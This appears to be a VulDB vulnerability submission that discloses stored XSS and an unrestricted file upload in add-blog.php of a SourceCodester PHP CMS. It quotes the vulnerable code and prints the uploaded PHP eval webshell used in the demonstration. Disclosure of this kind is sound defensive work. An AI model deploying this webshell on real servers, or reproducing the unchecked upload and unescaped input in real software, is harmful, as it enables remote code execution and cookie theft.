Submit #43143: VOgue CMS exist XSS and File upload vulnerabilityinfo

Title	VOgue CMS exist XSS and File upload vulnerability
Description	THE Vogue CMS exist XSS vulnerability.The system does not do anything with input and output. Attackers can construct malicious code to steal user and administrator cookies.At the same time, there is a file upload vulnerability in this system.It will allow an attacker to implement a background getshell. The location of the vulnerable file is: vogue/dashboard/add-blog.php ``` if(ISSET($_POST['save'])){ $blog_title = mysqli_real_escape_string($con,$_POST['blog_title']); $blog_desc = mysqli_real_escape_string($con,$_POST['blog_desc']); $blog_detail = mysqli_real_escape_string($con,$_POST['blog_detail']); if ( strlen($blog_title) < 5 ){ $msg=$msg."Blog Title Must Be More Than 5 Char Length.<BR>"; $status= "NOTOK";} if ( strlen($blog_desc) > 150 ){ $msg=$msg."Short description Must Be Less Than 150 Char Length.<BR>"; $status= "NOTOK";} if ( strlen($blog_detail) < 15 ){ $msg=$msg."Blog Detail Must Be More Than 15 Char Length.<BR>"; $status= "NOTOK";} ``` The uploaded variables in the source code only limit the length, and there is no protection against XSS, which leads to the appearance of XSS Process to demonstrate. https://img-blog.csdnimg.cn/8e0b109507c84f67a2803b1e88903068.png https://img-blog.csdnimg.cn/93511beae80a4dd08c4b7c8da4c95fad.png https://img-blog.csdnimg.cn/9453329a61924edaa5796b903d7b54e5.png This file also has an upload vulnerability. ``` $uploads_dir = 'uploads/blog'; $tmp_name = $_FILES["ufile"]["tmp_name"]; // basename() may prevent filesystem traversal attacks; // further validation/sanitation of the filename may be appropriate $name = basename($_FILES["ufile"]["name"]); $random_digit=rand(0000,9999); $new_file_name=$random_digit.$name; move_uploaded_file($tmp_name, "$uploads_dir/$new_file_name"); ``` The file format is not checked when uploading files in the source code, so that Trojan files can be uploaded normally Process to demonstrate https://img-blog.csdnimg.cn/3719e7cac044498680798649bcda1d74.png https://img-blog.csdnimg.cn/dceadc33a7c2405187c5048aa4f77693.png https://img-blog.csdnimg.cn/eea7dcec598747fba3ae59d02d80e2a8.png https://img-blog.csdnimg.cn/b9ad782d226443418f3986c48d5d7ebc.png https://img-blog.csdnimg.cn/ea270ce3986240ca850dc5acb7b429f9.png Upload file content ``` <?php phpinfo(); @eval($_POST[1]); ?> ``` Download the source code https://www.sourcecodester.com/php/15517/company-website-cms-php.html
Source	⚠️ https://www.quan9i.top
User	quan9i (UID 30726)
Submission	08/08/2022 19:08 (4 years ago)
Moderation	08/09/2022 07:59 (13 hours later)
Status	Accepted
VulDB entry	205838 [SourceCodester Company Website CMS add-blog.php cross site scripting]
Points	17

◂ Previous Overview Next ▸

Do you know our Splunk app?

Download it now for free!